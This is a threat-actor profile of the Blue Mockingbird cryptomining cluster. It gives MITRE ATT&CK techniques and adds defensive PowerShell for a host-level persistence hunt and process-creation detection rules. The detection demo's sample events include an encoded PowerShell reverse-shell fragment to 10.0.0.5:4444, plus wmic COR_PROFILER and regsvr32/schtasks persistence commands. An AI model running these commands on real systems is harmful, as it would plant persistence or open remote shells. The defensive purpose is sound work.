
Threat Actor Characterization

Blue Mockingbird

ID: 8c0aa8783c9b2d5250408b8edf3fb67958982
Category: Cybercrime / Cybercriminal
Threat types: Cryptomining, Intrusion, Malware
Attribution: Unknown
Operation zone: Unknown
Created: 2025-10-21
Updated: 2026-01-13
Profile progress: 35% | Completeness: 28% | Freshness: 50%
Aliases: none registered
MITRE ATT&CK®

Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019. Ref: https://attack.mitre.org/groups/G0108/


Technique | Name | Tactic(s) | Evidence
T1003.001 | OS Credential Dumping: LSASS Memory | TA0006 Credential Access | Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.
T1021.001 | Remote Services: Remote Desktop Protocol | TA0008 Lateral Movement | Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.
T1021.002 | Remote Services: SMB/Windows Admin Shares | TA0008 Lateral Movement | Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.
T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | TA0005 Defense Evasion | Blue Mockingbird has obfuscated the wallet address in the payload binary.
T1036.005 | Masquerading: Match Legitimate Resource Name or Location | TA0005 Defense Evasion | Blue Mockingbird has named its XMRIG payload wercplsupporte.dll after the legitimate wercplsupport.dll.
T1053.005 | Scheduled Task/Job: Scheduled Task | TA0002 Execution, TA0003 Persistence, TA0004 Privilege Escalation | Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts.
T1059.001 | Command and Scripting Interpreter: PowerShell | TA0002 Execution | Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | TA0002 Execution | Blue Mockingbird has used batch script files to automate execution and deployment of payloads.
T1218.010 | System Binary Proxy Execution: Regsvr32 | TA0005 Defense Evasion | Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.
T1218.011 | System Binary Proxy Execution: Rundll32 | TA0005 Defense Evasion | Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.
T1496.001 | Resource Hijacking: Compute Hijacking | TA0040 Impact | Blue Mockingbird has used XMRIG to mine cryptocurrency on victim systems.
T1543.003 | Create or Modify System Process: Windows Service | TA0003 Persistence, TA0004 Privilege Escalation | Blue Mockingbird has made its XMRIG payloads persistent as a Windows Service.
T1546.003 | Event Triggered Execution: WMI Event Subscription | TA0003 Persistence, TA0004 Privilege Escalation | Blue Mockingbird has used mofcomp.exe to establish WMI event subscription persistence configured from a *.mof file.
T1569.002 | System Services: Service Execution | TA0002 Execution | Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to run via the "wercplsupport" service.
T1574.012 | Hijack Execution Flow: COR_PROFILER | TA0003 Persistence, TA0004 Privilege Escalation, TA0005 Defense Evasion | Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable so that a malicious DLL is loaded whenever a process loads the .NET CLR.
T1588.002 | Obtain Capabilities: Tool | TA0042 Resource Development | Blue Mockingbird has obtained and used tools such as Mimikatz.
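The persistence rows in the table (COR_PROFILER, the repurposed wercplsupport service, WMI event subscriptions, scheduled tasks driving regsvr32/rundll32, and the misspelt DLL name) describe host state that can be checked directly. The script below is an added example of such a host-level hunt; it is not tooling from this profile, from MITRE, or from the reports behind the evidence column. The only specifics it relies on are the names in the table (the wercplsupport service, wercplsupporte.dll, COR_PROFILER, regsvr32/rundll32). The registry locations it reads, the scope of the file search and the shape of the finding records are my assumptions about where such artefacts normally live and how a hunter would want them reported.

```powershell
# Host-level hunt for the persistence artefacts in the table above. Added example: not
# tooling from the profile, MITRE or the cited reports. Run in an elevated PowerShell
# 5.1+ session. Names come from the table (wercplsupport service, wercplsupporte.dll,
# COR_PROFILER, regsvr32/rundll32, WMI subscriptions, scheduled tasks); the registry
# locations read and the file-search scope are assumptions about where such artefacts
# normally live.

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Technique, [string]$Where, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Technique = $Technique; Where = $Where; Detail = $Detail })
}

# T1574.012: COR_PROFILER in the machine-wide and current-user environment keys. Every
# .NET process started after these are set loads the named DLL as its CLR profiler.
$envKeys = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment', 'HKCU:\Environment'
foreach ($key in $envKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    foreach ($name in 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH') {
        if ($props -and $props.PSObject.Properties[$name]) {
            Add-Finding 'T1574.012' $key "$name = $($props.$name)"
        }
    }
}

# T1543.003 / T1569.002 / T1036.005, plus per-service COR_PROFILER (T1574.012): walk every
# service key. Flag the misspelt DLL as a ServiceDll, a wercplsupport service whose
# ServiceDll is not the genuine one, and an Environment value that sets COR_PROFILER.
$svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$realDll = Join-Path $env:SystemRoot 'System32\wercplsupport.dll'
foreach ($svc in Get-ChildItem -Path $svcRoot -ErrorAction SilentlyContinue) {
    $main   = Get-ItemProperty -Path $svc.PSPath -ErrorAction SilentlyContinue
    $params = Get-ItemProperty -Path (Join-Path $svc.PSPath 'Parameters') -ErrorAction SilentlyContinue
    $dll    = if ($params -and $params.ServiceDll) { [Environment]::ExpandEnvironmentVariables($params.ServiceDll) }
    if ($dll -and $dll -match '(?i)wercplsupporte\.dll$') {
        Add-Finding 'T1036.005' $svc.PSChildName "ServiceDll = $dll"
    }
    if ($svc.PSChildName -ieq 'wercplsupport' -and $dll -and $dll -ine $realDll) {
        Add-Finding 'T1569.002' 'wercplsupport' "ServiceDll = $dll (expected $realDll)"
    }
    if ($main -and $main.Environment -and (($main.Environment -join ' ') -match '(?i)COR_PROFILER')) {
        Add-Finding 'T1574.012' "$svcRoot\$($svc.PSChildName)" "Environment = $($main.Environment -join '; ')"
    }
}

# T1546.003: permanent WMI event subscriptions. A stock host has only Microsoft's
# "SCM Event Log" filter/consumer binding; anything else, and any CommandLineEventConsumer
# or ActiveScriptEventConsumer, deserves a look.
$ns = 'root\subscription'
foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue) {
    Add-Finding 'T1546.003' "$ns binding" "Filter=$($b.Filter.Name) Consumer=$($b.Consumer.Name)"
}
foreach ($c in Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue) {
    $body = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } elseif ($c.ScriptText) { $c.ScriptText } else { '(no command/script body)' }
    Add-Finding 'T1546.003' "$ns $($c.CimClass.CimClassName) '$($c.Name)'" $body
}

# T1053.005 with T1218.010/.011: scheduled tasks whose action is regsvr32 or rundll32
# handed a DLL (Get-ScheduledTask -CimSession runs the same check on remote hosts).
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($a in $task.Actions) {
        if ($a.Execute -match '(?i)(^|\\)(regsvr32|rundll32)(\.exe)?$' -and $a.Arguments -match '(?i)\.dll') {
            Add-Finding 'T1053.005' "$($task.TaskPath)$($task.TaskName)" "$($a.Execute) $($a.Arguments)"
        }
    }
}

# T1036.005: the misspelt filename on disk. The genuine file is wercplsupport.dll (no
# trailing 'e'), so every hit is a finding. Recursing %SystemRoot% takes a while.
foreach ($hit in Get-ChildItem -Path $env:SystemRoot -Filter 'wercplsupporte.dll' -File -Recurse -ErrorAction SilentlyContinue) {
    Add-Finding 'T1036.005' $hit.FullName ('{0} bytes, modified {1:u}' -f $hit.Length, $hit.LastWriteTime)
}

if ($findings.Count -eq 0) { 'No Blue Mockingbird-style persistence artefacts found on this host.' }
else { $findings | Sort-Object Technique, Where | Format-Table -AutoSize -Wrap }
```

Two caveats when reading the output. Every WMI binding and consumer is reported rather than filtered, because the profile gives no filter or consumer names to match on; on an unmodified Windows install the only entries are Microsoft's SCM Event Log filter and consumer, so anything beyond that pair is what to investigate. The service walk reports a wercplsupport ServiceDll that differs from %SystemRoot%\System32\wercplsupport.dll, which is the genuine value on a stock host; verify that baseline against a known-good machine of the same build before treating a mismatch as confirmed.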
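The execution-side rows (mofcomp compiling a .mof, wmic.exe and registry edits setting COR_PROFILER, regsvr32/rundll32 loading the miner DLL, scheduled tasks, PowerShell reverse TCP shells) are better caught from process-creation telemetry than from host state. The block below is an added example of detection rules for those behaviours run over constructed sample events; it is not code from this profile, from MITRE or from the actor. The rules are my own and are tuned only to what the table states, so they will need local allow-listing; the sample events, the 10.0.0.5 address, the file paths, the null-GUID profiler CLSID and the user names are all made up for the demonstration, and Get-SysmonProcessCreate assumes Sysmon is installed and logging Event ID 1.

```powershell
# Process-creation detection rules for the execution-side techniques in the table above:
# mofcomp compiling a MOF (T1546.003), wmic/reg writing COR_PROFILER (T1574.012),
# regsvr32/rundll32 loading a DLL (T1218.010/.011), schtasks creating such a task
# (T1053.005) and PowerShell reverse-shell primitives (T1059.001). Added example, not the
# profile's, MITRE's or the actor's code. The sample events are constructed for this
# demo; Get-SysmonProcessCreate reads real Sysmon Event ID 1 records instead.

function Expand-EncodedCommand([string]$CommandLine) {
    # Append the decoded UTF-16LE payload of -EncodedCommand/-enc so rules see both forms.
    if ($CommandLine -match '(?i)-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return $CommandLine + ' ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) }
        catch { }
    }
    return $CommandLine
}

$rules = @(
    @{ Technique = 'T1546.003'; Name = 'mofcomp compiling a MOF file'
       Test = { param($e) $e.Image -match '(?i)\\mofcomp\.exe$' -and $e.CommandLine -match '(?i)\.mof\b' } }
    @{ Technique = 'T1574.012'; Name = 'COR_PROFILER set through wmic or reg'
       Test = { param($e) $e.Image -match '(?i)\\(wmic|reg)\.exe$' -and
                          $e.CommandLine -match '(?i)COR_PROFILER|COR_ENABLE_PROFILING' } }
    @{ Technique = 'T1218.010/T1218.011'; Name = 'regsvr32/rundll32 loading a masqueraded or non-system DLL'
       Test = { param($e) $e.Image -match '(?i)\\(regsvr32|rundll32)\.exe$' -and
                          ($e.CommandLine -match '(?i)wercplsupporte\.dll' -or
                           $e.CommandLine -match '(?i)[a-z]:\\(?!windows\\(system32|syswow64)\\)[^"\s]*\.dll') } }
    @{ Technique = 'T1053.005'; Name = 'schtasks creating a task that runs regsvr32/rundll32'
       Test = { param($e) $e.Image -match '(?i)\\schtasks\.exe$' -and $e.CommandLine -match '(?i)/create' -and
                          $e.CommandLine -match '(?i)regsvr32|rundll32' } }
    @{ Technique = 'T1059.001'; Name = 'PowerShell reverse TCP shell primitives'
       Test = { param($e) $e.Image -match '(?i)\\(powershell|pwsh)\.exe$' -and
                          $e.CommandLine -match '(?i)Net\.Sockets\.TCPClient|\.GetStream\(\)' } }
)

function Invoke-DetectionRules($Events) {
    # One record per (event, rule) hit; rules are evaluated on the decoded command line.
    foreach ($e in $Events) {
        $view = [pscustomobject]@{ Image = $e.Image; CommandLine = (Expand-EncodedCommand $e.CommandLine) }
        foreach ($r in $rules) {
            if (& $r.Test $view) {
                [pscustomobject]@{ Time = $e.TimeCreated; Technique = $r.Technique; Rule = $r.Name
                                   User = $e.User; CommandLine = $e.CommandLine }
            }
        }
    }
}

function Get-SysmonProcessCreate {
    # Live input: Sysmon Event ID 1 shaped like the sample events (needs Sysmon installed).
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction Stop |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; Image = $d.Image; CommandLine = $d.CommandLine; User = $d.User }
        }
}

# Constructed sample telemetry (not real captures): five events that should fire, one benign.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    '$c = New-Object Net.Sockets.TCPClient("10.0.0.5", 4444); $s = $c.GetStream()'))
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:01'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Windows\System32\wbem\mofcomp.exe'; CommandLine = 'mofcomp.exe C:\Windows\Temp\persist.mof' }
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:02'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Windows\System32\wbem\WMIC.exe'
                       CommandLine = 'wmic.exe ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="{00000000-0000-0000-0000-000000000000}"' }
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:03'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Windows\System32\regsvr32.exe'; CommandLine = 'regsvr32.exe /s C:\ProgramData\wercplsupporte.dll' }
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:04'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Windows\System32\schtasks.exe'
                       CommandLine = 'schtasks.exe /create /tn Update /tr "regsvr32.exe /s C:\ProgramData\wercplsupporte.dll" /sc onstart /ru SYSTEM' }
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:05'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = "powershell.exe -nop -w hidden -enc $encoded" }
    [pscustomobject]@{ TimeCreated = '2020-05-01 10:00:06'; User = 'CORP\alice'
                       Image = 'C:\Windows\System32\rundll32.exe'; CommandLine = 'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL' }
)

Invoke-DetectionRules $sampleEvents | Format-Table -AutoSize -Wrap
# Live host: Invoke-DetectionRules (Get-SysmonProcessCreate) | Format-Table -AutoSize -Wrap
```

The encoded-command expansion matters for the T1059.001 rule: a reverse shell is usually passed as -EncodedCommand, so the TCPClient/GetStream strings only become visible after the base64 UTF-16LE payload is decoded, which is why the rules are evaluated against the expanded line while the report still carries the original. The regsvr32/rundll32 rule deliberately ignores DLLs under \Windows\System32 and \Windows\SysWOW64 (hence the benign shell32.dll sample does not fire) except for the exact misspelt name from the table, since the profile does not say where the miner DLL was staged.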